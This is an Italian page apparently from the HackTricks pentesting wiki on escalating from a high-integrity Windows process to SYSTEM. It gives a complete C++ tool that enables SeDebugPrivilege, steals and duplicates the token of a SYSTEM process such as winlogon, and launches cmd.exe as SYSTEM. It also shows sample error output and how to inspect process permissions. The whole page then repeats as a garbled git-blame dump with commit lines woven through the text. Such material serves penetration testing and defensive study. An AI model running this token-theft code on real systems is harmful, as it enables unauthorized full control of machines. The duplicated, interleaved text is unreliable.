hacktricks/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md

# SeImpersonate da High a System

{% hint style="success" %}
Impara e pratica il hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Impara e pratica il hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Supporta HackTricks</summary>

* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.

</details>
{% endhint %}

### Codice

Il seguente codice è tratto da [qui](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962). Permette di **indicare un ID processo come argomento** e un CMD **che viene eseguito come l'utente** del processo indicato verrà eseguito.\
Eseguendo in un processo ad alta integrità, puoi **indicare il PID di un processo in esecuzione come System** (come winlogon, wininit) ed eseguire un cmd.exe come system.
```cpp
impersonateuser.exe 1234
```
{% code title="impersonateuser.cpp" %}
```cpp
// From https://securitytimes.medium.com/understanding-and-abusing-access-tokens-part-ii-b9069f432962

#include <windows.h>
#include <iostream>
#include <Lmcons.h>
BOOL SetPrivilege(
HANDLE hToken,          // access token handle
LPCTSTR lpszPrivilege,  // name of privilege to enable/disable
BOOL bEnablePrivilege   // to enable or disable privilege
)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(
NULL,            // lookup privilege on local system
lpszPrivilege,   // privilege to lookup
&luid))        // receives LUID of privilege
{
printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
if (!AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES)NULL,
(PDWORD)NULL))
{
printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
printf("[-] The token does not have the specified privilege. \n");
return FALSE;
}
return TRUE;
}
std::string get_username()
{
TCHAR username[UNLEN + 1];
DWORD username_len = UNLEN + 1;
GetUserName(username, &username_len);
std::wstring username_w(username);
std::string username_s(username_w.begin(), username_w.end());
return username_s;
}
int main(int argc, char** argv) {
// Print whoami to compare to thread later
printf("[+] Current user is: %s\n", (get_username()).c_str());
// Grab PID from command line argument
char* pid_c = argv[1];
DWORD PID_TO_IMPERSONATE = atoi(pid_c);
// Initialize variables and structures
HANDLE tokenHandle = NULL;
HANDLE duplicateTokenHandle = NULL;
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInformation;
ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
startupInfo.cb = sizeof(STARTUPINFO);
// Add SE debug privilege
HANDLE currentTokenHandle = NULL;
BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
{
printf("[+] SeDebugPrivilege enabled!\n");
}
// Call OpenProcess(), print return code and error code
HANDLE processHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, true, PID_TO_IMPERSONATE);
if (GetLastError() == NULL)
printf("[+] OpenProcess() success!\n");
else
{
printf("[-] OpenProcess() Return Code: %i\n", processHandle);
printf("[-] OpenProcess() Error: %i\n", GetLastError());
}
// Call OpenProcessToken(), print return code and error code
BOOL getToken = OpenProcessToken(processHandle, MAXIMUM_ALLOWED, &tokenHandle);
if (GetLastError() == NULL)
printf("[+] OpenProcessToken() success!\n");
else
{
printf("[-] OpenProcessToken() Return Code: %i\n", getToken);
printf("[-] OpenProcessToken() Error: %i\n", GetLastError());
}
// Impersonate user in a thread
BOOL impersonateUser = ImpersonateLoggedOnUser(tokenHandle);
if (GetLastError() == NULL)
{
printf("[+] ImpersonatedLoggedOnUser() success!\n");
printf("[+] Current user is: %s\n", (get_username()).c_str());
printf("[+] Reverting thread to original user context\n");
RevertToSelf();
}
else
{
printf("[-] ImpersonatedLoggedOnUser() Return Code: %i\n", getToken);
printf("[-] ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
}
// Call DuplicateTokenEx(), print return code and error code
BOOL duplicateToken = DuplicateTokenEx(tokenHandle, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);
if (GetLastError() == NULL)
printf("[+] DuplicateTokenEx() success!\n");
else
{
printf("[-] DuplicateTokenEx() Return Code: %i\n", duplicateToken);
printf("[-] DupicateTokenEx() Error: %i\n", GetLastError());
}
// Call CreateProcessWithTokenW(), print return code and error code
BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &startupInfo, &processInformation);
if (GetLastError() == NULL)
printf("[+] Process spawned!\n");
else
{
printf("[-] CreateProcessWithTokenW Return Code: %i\n", createProcess);
printf("[-] CreateProcessWithTokenW Error: %i\n", GetLastError());
}
return 0;
}
```
{% endcode %}

### Errore

In alcune occasioni potresti provare a impersonare il System e non funzionerà mostrando un output simile al seguente:
```cpp
[+] OpenProcess() success!
[+] OpenProcessToken() success!
[-] ImpersonatedLoggedOnUser() Return Code: 1
[-] ImpersonatedLoggedOnUser() Error: 5
[-] DuplicateTokenEx() Return Code: 0
[-] DupicateTokenEx() Error: 5
[-] CreateProcessWithTokenW Return Code: 0
[-] CreateProcessWithTokenW Error: 1326
```
Questo significa che anche se stai eseguendo a un livello di alta integrità **non hai abbastanza permessi**.\
Controlliamo i permessi attuali dell'Amministratore sui processi `svchost.exe` con **processes explorer** (o puoi anche usare process hacker):

1. Seleziona un processo di `svchost.exe`
2. Clicca con il tasto destro --> Proprietà
3. Nella scheda "Sicurezza" clicca in basso a destra sul pulsante "Permessi"
4. Clicca su "Avanzate"
5. Seleziona "Amministratori" e clicca su "Modifica"
6. Clicca su "Mostra permessi avanzati"

![](<../../.gitbook/assets/image (437).png>)

L'immagine precedente contiene tutti i privilegi che "Amministratori" hanno sul processo selezionato (come puoi vedere nel caso di `svchost.exe` hanno solo privilegi di "Query")

Guarda i privilegi che "Amministratori" hanno su `winlogon.exe`:

![](<../../.gitbook/assets/image (1102).png>)

All'interno di quel processo "Amministratori" possono "Leggere la memoria" e "Leggere i permessi", il che probabilmente consente agli Amministratori di impersonare il token utilizzato da questo processo.

{% hint style="success" %}
Impara e pratica AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Impara e pratica GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Supporta HackTricks</summary>

* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repository github.

</details>
{% endhint %}
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`# SeImpersonate da High a System`

Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:12:26 +00:00			`{% hint style="success" %}`
			`Impara e pratica il hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Impara e pratica il hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:12:26 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:12:26 +00:00			`<summary>Supporta HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:12:26 +00:00			`* Controlla i [piani di abbonamento](https://github.com/sponsors/carlospolop)!`
			`* Unisciti al 💬 [gruppo Discord](https://discord.gg/hRep4RUj7f) o al [gruppo telegram](https://t.me/peass) o seguici su Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Condividi trucchi di hacking inviando PR ai [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos su github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:12:26 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`### Codice`
GitBook: [master] 2 pages and 2 assets modified 2020-08-30 22:32:59 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:12:26 +00:00			`Il seguente codice è tratto da [qui](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962). Permette di indicare un ID processo come argomento e un CMD che viene eseguito come l'utente del processo indicato verrà eseguito.\`
			`Eseguendo in un processo ad alta integrità, puoi indicare il PID di un processo in esecuzione come System (come winlogon, wininit) ed eseguire un cmd.exe come system.`
GitBook: [master] 2 pages and 2 assets modified 2020-08-30 22:32:59 +00:00			```cpp
			`impersonateuser.exe 1234`
			```
			`{% code title="impersonateuser.cpp" %}`
			```cpp
a 2024-02-08 03:06:37 +00:00			`// From https://securitytimes.medium.com/understanding-and-abusing-access-tokens-part-ii-b9069f432962`

GitBook: [master] 2 pages and 2 assets modified 2020-08-30 22:32:59 +00:00			`#include <windows.h>`
			`#include <iostream>`
			`#include <Lmcons.h>`
			`BOOL SetPrivilege(`
Translated to Italian 2024-02-10 13:03:23 +00:00			`HANDLE hToken, // access token handle`
			`LPCTSTR lpszPrivilege, // name of privilege to enable/disable`
			`BOOL bEnablePrivilege // to enable or disable privilege`
GitBook: [master] 2 pages and 2 assets modified 2020-08-30 22:32:59 +00:00			`)`
			`{`
Translated to Italian 2024-02-10 13:03:23 +00:00			`TOKEN_PRIVILEGES tp;`
			`LUID luid;`
			`if (!LookupPrivilegeValue(`
			`NULL, // lookup privilege on local system`
			`lpszPrivilege, // privilege to lookup`
			`&luid)) // receives LUID of privilege`
			`{`
			`printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());`
			`return FALSE;`
			`}`
			`tp.PrivilegeCount = 1;`
			`tp.Privileges[0].Luid = luid;`
			`if (bEnablePrivilege)`
			`tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;`
			`else`
			`tp.Privileges[0].Attributes = 0;`
			`// Enable the privilege or disable all privileges.`
			`if (!AdjustTokenPrivileges(`
			`hToken,`
			`FALSE,`
			`&tp,`
			`sizeof(TOKEN_PRIVILEGES),`
			`(PTOKEN_PRIVILEGES)NULL,`
			`(PDWORD)NULL))`
			`{`
			`printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());`
			`return FALSE;`
			`}`
			`if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)`
			`{`
			`printf("[-] The token does not have the specified privilege. \n");`
			`return FALSE;`
			`}`
			`return TRUE;`
GitBook: [master] 2 pages and 2 assets modified 2020-08-30 22:32:59 +00:00			`}`
			`std::string get_username()`
			`{`
Translated to Italian 2024-02-10 13:03:23 +00:00			`TCHAR username[UNLEN + 1];`
			`DWORD username_len = UNLEN + 1;`
			`GetUserName(username, &username_len);`
			`std::wstring username_w(username);`
			`std::string username_s(username_w.begin(), username_w.end());`
			`return username_s;`
GitBook: [master] 2 pages and 2 assets modified 2020-08-30 22:32:59 +00:00			`}`
			`int main(int argc, char** argv) {`
Translated to Italian 2024-02-10 13:03:23 +00:00			`// Print whoami to compare to thread later`
			`printf("[+] Current user is: %s\n", (get_username()).c_str());`
			`// Grab PID from command line argument`
			`char* pid_c = argv[1];`
			`DWORD PID_TO_IMPERSONATE = atoi(pid_c);`
			`// Initialize variables and structures`
			`HANDLE tokenHandle = NULL;`
			`HANDLE duplicateTokenHandle = NULL;`
			`STARTUPINFO startupInfo;`
			`PROCESS_INFORMATION processInformation;`
			`ZeroMemory(&startupInfo, sizeof(STARTUPINFO));`
			`ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));`
			`startupInfo.cb = sizeof(STARTUPINFO);`
			`// Add SE debug privilege`
			`HANDLE currentTokenHandle = NULL;`
			`BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);`
			`if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))`
			`{`
			`printf("[+] SeDebugPrivilege enabled!\n");`
			`}`
			`// Call OpenProcess(), print return code and error code`
			`HANDLE processHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, true, PID_TO_IMPERSONATE);`
			`if (GetLastError() == NULL)`
			`printf("[+] OpenProcess() success!\n");`
			`else`
			`{`
			`printf("[-] OpenProcess() Return Code: %i\n", processHandle);`
			`printf("[-] OpenProcess() Error: %i\n", GetLastError());`
			`}`
			`// Call OpenProcessToken(), print return code and error code`
			`BOOL getToken = OpenProcessToken(processHandle, MAXIMUM_ALLOWED, &tokenHandle);`
			`if (GetLastError() == NULL)`
			`printf("[+] OpenProcessToken() success!\n");`
			`else`
			`{`
			`printf("[-] OpenProcessToken() Return Code: %i\n", getToken);`
			`printf("[-] OpenProcessToken() Error: %i\n", GetLastError());`
			`}`
			`// Impersonate user in a thread`
			`BOOL impersonateUser = ImpersonateLoggedOnUser(tokenHandle);`
			`if (GetLastError() == NULL)`
			`{`
			`printf("[+] ImpersonatedLoggedOnUser() success!\n");`
			`printf("[+] Current user is: %s\n", (get_username()).c_str());`
			`printf("[+] Reverting thread to original user context\n");`
			`RevertToSelf();`
			`}`
			`else`
			`{`
			`printf("[-] ImpersonatedLoggedOnUser() Return Code: %i\n", getToken);`
			`printf("[-] ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());`
			`}`
			`// Call DuplicateTokenEx(), print return code and error code`
			`BOOL duplicateToken = DuplicateTokenEx(tokenHandle, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);`
			`if (GetLastError() == NULL)`
			`printf("[+] DuplicateTokenEx() success!\n");`
			`else`
			`{`
			`printf("[-] DuplicateTokenEx() Return Code: %i\n", duplicateToken);`
			`printf("[-] DupicateTokenEx() Error: %i\n", GetLastError());`
			`}`
			`// Call CreateProcessWithTokenW(), print return code and error code`
			`BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &startupInfo, &processInformation);`
			`if (GetLastError() == NULL)`
			`printf("[+] Process spawned!\n");`
			`else`
			`{`
			`printf("[-] CreateProcessWithTokenW Return Code: %i\n", createProcess);`
			`printf("[-] CreateProcessWithTokenW Error: %i\n", GetLastError());`
			`}`
			`return 0;`
GitBook: [master] 2 pages and 2 assets modified 2020-08-30 22:32:59 +00:00			`}`
			```
			`{% endcode %}`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`### Errore`
GitBook: [master] 2 pages and 2 assets modified 2020-08-30 22:32:59 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:12:26 +00:00			`In alcune occasioni potresti provare a impersonare il System e non funzionerà mostrando un output simile al seguente:`
GitBook: [master] 2 pages and 2 assets modified 2020-08-30 22:32:59 +00:00			```cpp
			`[+] OpenProcess() success!`
			`[+] OpenProcessToken() success!`
			`[-] ImpersonatedLoggedOnUser() Return Code: 1`
			`[-] ImpersonatedLoggedOnUser() Error: 5`
			`[-] DuplicateTokenEx() Return Code: 0`
			`[-] DupicateTokenEx() Error: 5`
			`[-] CreateProcessWithTokenW Return Code: 0`
			`[-] CreateProcessWithTokenW Error: 1326`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:12:26 +00:00			`Questo significa che anche se stai eseguendo a un livello di alta integrità non hai abbastanza permessi.\`
			Controlliamo i permessi attuali dell'Amministratore sui processi `svchost.exe` con processes explorer (o puoi anche usare process hacker):
GitBook: [master] 2 pages and 2 assets modified 2020-08-30 22:32:59 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			1. Seleziona un processo di `svchost.exe`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:12:26 +00:00			`2. Clicca con il tasto destro --> Proprietà`
			`3. Nella scheda "Sicurezza" clicca in basso a destra sul pulsante "Permessi"`
			`4. Clicca su "Avanzate"`
			`5. Seleziona "Amministratori" e clicca su "Modifica"`
			`6. Clicca su "Mostra permessi avanzati"`
GitBook: [master] 2 pages and 2 assets modified 2020-08-30 22:32:59 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`![](<../../.gitbook/assets/image (437).png>)`
GitBook: [master] 2 pages and 2 assets modified 2020-08-30 22:32:59 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:12:26 +00:00			L'immagine precedente contiene tutti i privilegi che "Amministratori" hanno sul processo selezionato (come puoi vedere nel caso di `svchost.exe` hanno solo privilegi di "Query")
GitBook: [master] 2 pages and 2 assets modified 2020-08-30 22:32:59 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:12:26 +00:00			Guarda i privilegi che "Amministratori" hanno su `winlogon.exe`:
GitBook: [master] 2 pages and 2 assets modified 2020-08-30 22:32:59 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:09:41 +00:00			`![](<../../.gitbook/assets/image (1102).png>)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:12:26 +00:00			`All'interno di quel processo "Amministratori" possono "Leggere la memoria" e "Leggere i permessi", il che probabilmente consente agli Amministratori di impersonare il token utilizzato da questo processo.`

			`{% hint style="success" %}`
			`Impara e pratica AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Impara e pratica GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

			`<details>`

			`<summary>Supporta HackTricks</summary>`

			`* Controlla i [piani di abbonamento](https://github.com/sponsors/carlospolop)!`
			`* Unisciti al 💬 [gruppo Discord](https://discord.gg/hRep4RUj7f) o al [gruppo telegram](https://t.me/peass) o seguici su Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Condividi trucchi di hacking inviando PR ai [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repository github.`

			`</details>`
			`{% endhint %}`